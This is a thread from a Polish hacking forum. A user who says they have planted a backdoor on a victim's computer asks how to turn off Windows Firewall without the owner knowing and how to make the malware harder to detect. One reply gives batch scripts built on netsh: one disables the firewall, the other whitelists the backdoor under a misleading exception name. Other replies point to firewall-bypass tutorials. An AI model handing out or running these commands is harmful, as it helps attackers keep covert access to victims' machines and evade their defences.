Pokaż wyniki od 1 do 5 z 5

Temat: Coś co wylaczy zapore

Domyślnie Coś co wylaczy zapore

Czy istniej cos darmowego ze slaba wykrywalnoscia, cos co pzowoli bez wiedzy uytkownika wylaczyc zapore systemu windows? Mam backdoor'a ale jedyne co go blokuje u ofiary to zapora windowsa, moze da sie cos latwego napisac? ja w tych sprawach jestem zielony. Ale jak byscie mieli jakies ciekawe kursy w internecie, tez mozecie dac znac. I czy waszym zdaniem latwo jest zmniejszyc wykrywalnosc danego wirusa?

Dawni Moderatorzy Avatar grzonu

Domyślnie

Moze zamiast wylaczac firewalla co jest dosc "głośne" i trzeba wylaczac kazdego znanego firewalla lepiej omijac firewalla zerknij w moj tutorial o omijaniu firewalla.
    Filmy online---Grzonu Blog

1) Moje gg to nie pomoc techniczna w obsludze keyloggerow!!! Na gg i pw pomagam tylko w kwestiach organizacyjnych forum. Masz problem to pisz na forum.
    2) Nie zajmuje sie malware a uprzedzajac pytanie "czemu?" - bo taki mam kaprys!

Domyślnie

Zaporę systemową możesz wyłączyć skryptem .BAT :

@echo off
    netsh firewall set opmode disable

Jeśli chcesz dodać do wyjątków backdoora' :

@echo off
    netsh firewall add allowedprogram "Ścieżka do backdoor'a" "Zmylająca nazwa wyjątku" ENABLE
    netsh firewall set opmode disable

Użytkownik

Domyślnie

Co ty z tymi skryptami .Bat ... To działa tylko na zapore systemową ale przypuśćmy że 80 % osób korzysta z oprogramowania antywirusowego i owy program posiada własną zaporę , wtedy wyłączenie jej z poziomu Bat jest niemożliwe

A co do tematu poucz się co to są Bypassy .
    I jak je wykorzystać w praktyce . Pod windowsa ci nie pomogę .

Domyślnie

Dlatego napisałem "Zaporę systemową możesz wyłączyć skryptem .BAT".

Uprawnienia